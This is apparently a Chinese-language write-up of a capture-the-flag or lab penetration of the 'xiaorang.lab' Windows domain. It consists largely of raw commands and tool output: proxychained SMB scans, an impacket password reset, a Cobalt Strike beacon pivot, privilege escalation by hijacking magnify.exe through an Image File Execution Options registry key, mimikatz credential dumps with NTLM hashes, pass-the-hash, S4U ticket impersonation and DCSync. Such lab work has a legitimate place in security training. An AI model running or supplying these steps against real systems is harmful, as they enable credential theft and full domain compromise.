 ...  172.22.8.245:445 <--socket error or timeout!
 ...  172.22.8.246:445 <--socket error or timeout!
 ...  172.22.8.251:445 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
 ...  172.22.8.253:445 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
 ...  172.22.8.249:445 <--socket error or timeout!
<--socket error or timeout!
 ...  172.22.8.248:445  ...  172.22.8.252:445  ...  172.22.8.255:445 <--socket error or timeout!
 ...  172.22.8.250:445  ...  172.22.8.254:445 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  timeout

!!!need more proxies!!!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
 ...  172.22.8.209:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.208:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.210:445 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.216:445  ...  172.22.8.218:445  ...  172.22.8.211:445  ...  172.22.8.217:445 <--socket error or timeout!
 ...  172.22.8.215:445  ...  172.22.8.213:445 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
 ...  172.22.8.225:445  ...  172.22.8.214:445  ...  172.22.8.212:445  ...  172.22.8.222:445  ...  172.22.8.220:445  ...  172.22.8.226:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
 ...  172.22.8.228:445  ...  172.22.8.224:445  ...  172.22.8.221:445  ...  172.22.8.230:445  ...  172.22.8.223:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.229:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
 ...  172.22.8.232:445  ...  172.22.8.233:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.231:445  ...  172.22.8.236:445  ...  172.22.8.234:445  ...  172.22.8.235:445  ...  172.22.8.227:445  ...  172.22.8.239:445  ...  172.22.8.237:445 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
 ...  172.22.8.240:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.238:445  ...  172.22.8.243:445  ...  172.22.8.242:445  ...  172.22.8.241:445  ...  172.22.8.244:445 <--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
[proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191 <--socket error or timeout!
<--socket error or timeout!
 ...  172.22.8.247:445 [proxychains] Dynamic chain  ...  39.105.51.11:28191 [proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.248:445  ...  172.22.8.251:445  ...  172.22.8.254:445  ...  172.22.8.255:445  ...  172.22.8.249:445  ...  172.22.8.245:445  ...  172.22.8.253:445  ...  172.22.8.246:445  ...  172.22.8.250:445  ...  172.22.8.252:445  ...  timeout

!!!need more proxies!!!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!
<--socket error or timeout!

修改密码

登录密码过期修改密码proxychains4 -f /etc/proxychains4.conf python3 smbpasswd.py xiaorang.lab/Aldrich:‘Ald@rLMWuy7z!#‘@172.22.8.15 -newpass ‘Whoami@666’、

proxychains4 -f /etc/proxychains4.conf python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'Whoami@666'

┌──(root㉿kali)-[/home/kali/tools/impacket-master/examples]
└─# proxychains4 -f /etc/proxychains4.conf python3 smbpasswd.py xiaorang.lab/Aldrich:'Ald@rLMWuy7Z!#'@172.22.8.15 -newpass 'Whoami@666'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.15:445  ...  OK
[!] Password is expired, trying to bind with a null session.
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.15:445  ...  OK
[*] Password was changed successfully.

rdt

rdt远程登录桌面172.22.8.46、

46机器不出网 用18转发流量上线cs、【可以复制粘贴但是不能拖过去】

pivoting—listener—172.22.8.18创建listener 然后生成beacon利用rdt拖到46机器上、

映像劫持提权 先查看权限 get-acl -path “HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options” | fl * 、

PS C:\Users\Aldrich> get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *


PSPath                  : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
PSParentPath            : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
PSChildName             : Image File Execution Options
PSDrive                 : HKLM
PSProvider              : Microsoft.PowerShell.Core\Registry
CentralAccessPolicyId   :
CentralAccessPolicyName :
Path                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Owner                   : NT AUTHORITY\SYSTEM
Group                   : NT AUTHORITY\SYSTEM
Access                  : {System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAccessRule, System.Se
                          curity.AccessControl.RegistryAccessRule...}
Sddl                    : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;CCDCLCSWRPRC;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KR;;;BU)(A;CI;KR;;;AC)
AccessToString          : CREATOR OWNER Allow  FullControl
                          NT AUTHORITY\Authenticated Users Allow  SetValue, CreateSubKey, ReadKey
                          NT AUTHORITY\SYSTEM Allow  FullControl
                          BUILTIN\Administrators Allow  FullControl
                          BUILTIN\Users Allow  ReadKey
                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow  ReadKey
AuditToString           :
AccessRightType         : System.Security.AccessControl.RegistryRights
AccessRuleType          : System.Security.AccessControl.RegistryAccessRule
AuditRuleType           : System.Security.AccessControl.RegistryAuditRule
AreAccessRulesProtected : True
AreAuditRulesProtected  : False
AreAccessRulesCanonical : True
AreAuditRulesCanonical  : True

发现所有用户都可以修改注册表 利用此性质修改注册表映像劫持 使用放大镜提权 用户主页点击放大镜启动magnify.exe换成C:\windows\system32\cmd.exe 、

REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe”、

放大镜弹shell

锁定用户右键放大镜直接就进入system权限此时上线beacon、

shell type C:\Users\Administrator\flag\flag02.txt、

内网设置listener

内网的上线不了，这里可能应该选择john就行了。。

[+] established link to parent beacon: 172.22.8.18
beacon> sleep 2
[*] Tasked beacon to sleep for 2s [change made to: Beacon 172.22.8.18@3876]
beacon> shell type C:\Users\Administrator\flag\flag02.txt
[*] Tasked beacon to run: type C:\Users\Administrator\flag\flag02.txt
[+] host called home, sent: 74 bytes
[+] received output:
   . .    .       . .       . .       .      .       . .       . .       . .    .    
.+'|=|`+.=|`+. .+'|=|`+. .+'|=|`+. .+'|      |`+. .+'|=|`+. .+'|=|`+. .+'|=|`+.=|`+. 
|.+' |  | `+.| |  | `+.| |  | `+.| |  |      |  | |  | `+.| |  | `+ | |.+' |  | `+.| 
     |  |      |  | .    |  |      |  |      |  | |  |=|`.  |  |  | |      |  |      
     |  |      `+.|=|`+. |  |      |  |      |  | |  | `.|  |  |  | |      |  |      
     |  |      .    |  | |  |    . |  |    . |  | |  |    . |  |  | |      |  |      
     |  |      |`+. |  | |  | .+'| |  | .+'| |  | |  | .+'| |  |  | |      |  |      
     |.+'      `+.|=|.+' `+.|=|.+' `+.|=|.+' |.+' `+.|=|.+' `+.|  |.|      |.+'      




flag02: flag{63e7aaf2-492c-44fd-a612-2a0bc50c9891}

flag{63e7aaf2-492c-44fd-a612-2a0bc50c9891}

flag03

接下来进行域信息收集logonpasswords，shell net user /domain，shell net group “domain admins” /admin、win2016$在域管组 机器账户可以hash传递登录域控 相当于直接拿到了域控、他这里的做法是注入机器账户哈希pth然后dump域控哈希、shell C:\Users\\Aldrich\Desktop\mimikatz.exe “privilege::debug” “sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:哈希” “exit”、mimikatz dcsync dump所有用户的hash获得域控哈希、哈希传递登录域控、proxychains4 python3 smbexe.py -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08 administrator@172.22.8.15

接下来进行域信息收集logonpasswords，shell net user /domain，shell net group “domain admins” /admin、

beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82541 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8e2eec0e9e0d89e1b046b696e0c2aef7:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

beacon> shell net user /domain
[*] Tasked beacon to run: net user /domain
[+] host called home, sent: 47 bytes
[+] received output:
这项请求将在域 xiaorang.lab 的域控制器处理。


\\DC01.xiaorang.lab 的用户帐户

-------------------------------------------------------------------------------
Administrator            Aldrich                  Guest                    
krbtgt                   
命令运行完毕，但发生一个或多个错误。

beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[+] received output:

Authentication Id : 0 ; 10620427 (00000000:00a20e0b)
Session           : RemoteInteractive from 2
User Name         : Aldrich
Domain            : XIAORANG
Logon Server      : DC01
Logon Time        : 2023/11/27 13:56:40
SID               : S-1-5-21-3289074908-3315245560-3429321632-1105
	msv :	
	 [00000003] Primary
	 * Username : Aldrich
	 * Domain   : XIAORANG
	 * NTLM     : 3c42fe16daa873e60c5e9d0f966369e4
	 * SHA1     : 6e8d5826a1024aeec1593471f4b2bd90487d677f
	 * DPAPI    : 7acb09c872ec5ed2315f33d1d1c837be
	tspkg :	
	wdigest :	
	 * Username : Aldrich
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : Aldrich
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 10596936 (00000000:00a1b248)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/11/27 13:56:39
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : b0c71ada6635da7d6a583249798fa134
	 * SHA1     : 16fe18300bd7c47413c9a972cfdaeda0fea78c2e
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : xiaorang.lab
	 * Password : a0 bf c1 1e 5b 61 b4 4f db 4a a7 69 72 d7 bf d8 96 fd f3 7a 51 e7 48 87 14 10 c8 40 b3 9c e2 75 3d 9d f7 18 0e 70 4b f7 28 68 e0 d9 4c 04 4d 6c 58 5e ea 39 61 fa a0 d9 dc 74 ce 72 6b 14 27 ee b1 21 11 26 62 70 cd 54 5f b4 3f a6 44 86 10 b5 65 84 44 d4 a8 31 19 93 18 18 9d 5e 6c 3e 9c 29 c4 12 e6 9d a7 29 c9 72 47 4d 80 a6 cc f4 7f ed e7 47 5d f4 a2 52 17 90 95 b7 39 61 82 27 fb b8 8d 13 31 5a 41 3f 3b 41 b2 01 4b 7a 54 ca 0a a5 27 7b 24 27 4c d6 ce 7d 3e 5d d9 d5 17 2a 60 9e 60 b3 31 89 da fd 31 47 24 44 c3 5c be d9 48 07 a7 29 ba 9d 75 04 25 c4 d9 3e b4 37 8c e7 4e 2c 9b 21 5a 05 8c 75 d6 3b dd f8 b9 d3 4c a6 eb 8a 54 3b a7 57 dc f4 63 df 1d 61 74 0b 5a 5a e6 77 5e 89 92 25 ab 19 e3 44 0e 06 4a 2a e3 ca 84 1e 
	ssp :	
	credman :	

Authentication Id : 0 ; 53204 (00000000:0000cfd4)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/11/27 12:59:24
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : b0c71ada6635da7d6a583249798fa134
	 * SHA1     : 16fe18300bd7c47413c9a972cfdaeda0fea78c2e
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : xiaorang.lab
	 * Password : a0 bf c1 1e 5b 61 b4 4f db 4a a7 69 72 d7 bf d8 96 fd f3 7a 51 e7 48 87 14 10 c8 40 b3 9c e2 75 3d 9d f7 18 0e 70 4b f7 28 68 e0 d9 4c 04 4d 6c 58 5e ea 39 61 fa a0 d9 dc 74 ce 72 6b 14 27 ee b1 21 11 26 62 70 cd 54 5f b4 3f a6 44 86 10 b5 65 84 44 d4 a8 31 19 93 18 18 9d 5e 6c 3e 9c 29 c4 12 e6 9d a7 29 c9 72 47 4d 80 a6 cc f4 7f ed e7 47 5d f4 a2 52 17 90 95 b7 39 61 82 27 fb b8 8d 13 31 5a 41 3f 3b 41 b2 01 4b 7a 54 ca 0a a5 27 7b 24 27 4c d6 ce 7d 3e 5d d9 d5 17 2a 60 9e 60 b3 31 89 da fd 31 47 24 44 c3 5c be d9 48 07 a7 29 ba 9d 75 04 25 c4 d9 3e b4 37 8c e7 4e 2c 9b 21 5a 05 8c 75 d6 3b dd f8 b9 d3 4c a6 eb 8a 54 3b a7 57 dc f4 63 df 1d 61 74 0b 5a 5a e6 77 5e 89 92 25 ab 19 e3 44 0e 06 4a 2a e3 ca 84 1e 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN2016$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/11/27 12:59:24
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : b0c71ada6635da7d6a583249798fa134
	 * SHA1     : 16fe18300bd7c47413c9a972cfdaeda0fea78c2e
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : win2016$
	 * Domain   : XIAORANG.LAB
	 * Password : a0 bf c1 1e 5b 61 b4 4f db 4a a7 69 72 d7 bf d8 96 fd f3 7a 51 e7 48 87 14 10 c8 40 b3 9c e2 75 3d 9d f7 18 0e 70 4b f7 28 68 e0 d9 4c 04 4d 6c 58 5e ea 39 61 fa a0 d9 dc 74 ce 72 6b 14 27 ee b1 21 11 26 62 70 cd 54 5f b4 3f a6 44 86 10 b5 65 84 44 d4 a8 31 19 93 18 18 9d 5e 6c 3e 9c 29 c4 12 e6 9d a7 29 c9 72 47 4d 80 a6 cc f4 7f ed e7 47 5d f4 a2 52 17 90 95 b7 39 61 82 27 fb b8 8d 13 31 5a 41 3f 3b 41 b2 01 4b 7a 54 ca 0a a5 27 7b 24 27 4c d6 ce 7d 3e 5d d9 d5 17 2a 60 9e 60 b3 31 89 da fd 31 47 24 44 c3 5c be d9 48 07 a7 29 ba 9d 75 04 25 c4 d9 3e b4 37 8c e7 4e 2c 9b 21 5a 05 8c 75 d6 3b dd f8 b9 d3 4c a6 eb 8a 54 3b a7 57 dc f4 63 df 1d 61 74 0b 5a 5a e6 77 5e 89 92 25 ab 19 e3 44 0e 06 4a 2a e3 ca 84 1e 
	ssp :	
	credman :	

Authentication Id : 0 ; 23880 (00000000:00005d48)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2023/11/27 12:59:24
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : b0c71ada6635da7d6a583249798fa134
	 * SHA1     : 16fe18300bd7c47413c9a972cfdaeda0fea78c2e
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 10597075 (00000000:00a1b2d3)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/11/27 13:56:39
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : b0c71ada6635da7d6a583249798fa134
	 * SHA1     : 16fe18300bd7c47413c9a972cfdaeda0fea78c2e
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : xiaorang.lab
	 * Password : a0 bf c1 1e 5b 61 b4 4f db 4a a7 69 72 d7 bf d8 96 fd f3 7a 51 e7 48 87 14 10 c8 40 b3 9c e2 75 3d 9d f7 18 0e 70 4b f7 28 68 e0 d9 4c 04 4d 6c 58 5e ea 39 61 fa a0 d9 dc 74 ce 72 6b 14 27 ee b1 21 11 26 62 70 cd 54 5f b4 3f a6 44 86 10 b5 65 84 44 d4 a8 31 19 93 18 18 9d 5e 6c 3e 9c 29 c4 12 e6 9d a7 29 c9 72 47 4d 80 a6 cc f4 7f ed e7 47 5d f4 a2 52 17 90 95 b7 39 61 82 27 fb b8 8d 13 31 5a 41 3f 3b 41 b2 01 4b 7a 54 ca 0a a5 27 7b 24 27 4c d6 ce 7d 3e 5d d9 d5 17 2a 60 9e 60 b3 31 89 da fd 31 47 24 44 c3 5c be d9 48 07 a7 29 ba 9d 75 04 25 c4 d9 3e b4 37 8c e7 4e 2c 9b 21 5a 05 8c 75 d6 3b dd f8 b9 d3 4c a6 eb 8a 54 3b a7 57 dc f4 63 df 1d 61 74 0b 5a 5a e6 77 5e 89 92 25 ab 19 e3 44 0e 06 4a 2a e3 ca 84 1e 
	ssp :	
	credman :	

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/11/27 12:59:28
SID               : S-1-5-17
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/11/27 12:59:24
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 53247 (00000000:0000cfff)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/11/27 12:59:24
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * NTLM     : 4ba974f170ab0fe1a8a1eb0ed8f6fe1a
	 * SHA1     : e06238ecefc14d675f762b08a456770dc000f763
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : WIN2016$
	 * Domain   : xiaorang.lab
	 * Password : 9e ae c4 7a ed ee 91 74 a5 59 61 a5 00 2c c5 00 60 3b 87 48 d0 17 48 cf df 7b 14 af 9a 99 22 b5 94 ba 0a 1e f0 6e f0 25 b1 e2 a2 62 fb b8 68 93 42 64 08 b7 f6 2e f7 cf ae a3 7a 94 9d 32 24 1a b1 6b 87 6c 5e f1 d3 89 c6 c4 8b d3 bd 05 9c b0 e1 85 d4 2c 03 56 5f af 09 15 12 10 df 74 e7 4c d3 65 55 d8 ab bd b4 71 5c 8c a7 bd 14 60 8b 44 b5 d8 d8 61 23 f1 4f 4d 8e a0 dc ac 8a 60 15 0d f7 9f a1 85 98 c4 cf 34 ec ee ea c5 b9 5b 42 8b 97 cc 4d ed 1f db 8c b4 45 06 ce 40 fc 81 96 ac c3 61 e5 e9 42 90 69 f3 b2 85 fa 80 59 e2 8b a5 f6 70 5d 1a bd 5f b1 85 6b ae b0 16 42 29 2c 99 57 fb 49 ea e3 29 49 56 55 6c 9a 2b ee 13 77 fe d7 a3 51 b8 01 ec bb 60 22 b8 7c 2f f5 6b 0f 6b 87 36 76 45 81 7e e3 71 0a a8 ca 2a a3 a6 05 64 
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN2016$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/11/27 12:59:24
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN2016$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : win2016$
	 * Domain   : XIAORANG.LAB
	 * Password : (null)
	ssp :	
	credman :	

win2016$在域管组 机器账户可以hash传递登录域控 相当于直接拿到了域控、

他这里的做法是注入机器账户哈希pth然后dump域控哈希、

shell C:\Users\\Aldrich\Desktop\mimikatz.exe “privilege::debug” “sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:哈希” “exit”、

mimikatz dcsync dump所有用户的hash获得域控哈希、

哈希传递登录域控、

proxychains4 python3 smbexe.py -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08 administrator@172.22.8.15

proxychains4 -f /etc/proxychains4.conf python3 smbexec.py -hashes :8e2eec0e9e0d89e1b046b696e0c2aef7 administrator@172.22.8.15
aad3b435b51404eeaad3b435b51404ee:8e2eec0e9e0d89e1b046b696e0c2aef7

proxychains4 -f /etc/proxychains4.conf getST.py xiaorang.lab/WIN2016\$ -hashes :b0c71ada6635da7d6a583249798fa134 -dc-ip 172.22.8.15 -spn ldap/DC01.xiaorang.lab -impersonate administrator

shell C:\\Users\\Aldrich\\Desktop\\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:b0c71ada6635da7d6a583249798fa134" "exit"

┌──(root㉿kali)-[/home/kali/tools/impacket-master/examples]
└─# proxychains4 -f /etc/proxychains4.conf getST.py xiaorang.lab/WIN2016\$ -hashes :b0c71ada6635da7d6a583249798fa134 -dc-ip 172.22.8.15 -spn ldap/DC0xiaorang.lab -impersonate administrator
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.15:88  ...  OK
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.15:88  ...  OK
[*] Impersonating administrator
[*]     Requesting S4U2self
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.15:88  ...  OK
[*]     Requesting S4U2Proxy
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  172.22.8.15:88  ...  OK
[*] Saving ticket in administrator.ccache

shell C:\\Users\\Aldrich\\Desktop\\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:b0c71ada6635da7d6a583249798fa134" "exit"

beacon> shell C:\\Users\\Aldrich\\Desktop\\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:b0c71ada6635da7d6a583249798fa134" "exit"
[*] Tasked beacon to run: C:\\Users\\Aldrich\\Desktop\\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:b0c71ada6635da7d6a583249798fa134" "exit"
[+] host called home, sent: 189 bytes
[+] received output:

  .#####.   mimikatz 2.2.0 (x86) #18362 Feb 29 2020 11:13:10
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:b0c71ada6635da7d6a583249798fa134
user	: WIN2016$
domain	: xiaorang.lab
program	: cmd.exe
impers.	: no
NTLM	: b0c71ada6635da7d6a583249798fa134
  |  PID  5080
  |  TID  868
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS

mimikatz(commandline) # exit
Bye!

shell C:\\Users\\Aldrich\\Desktop\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

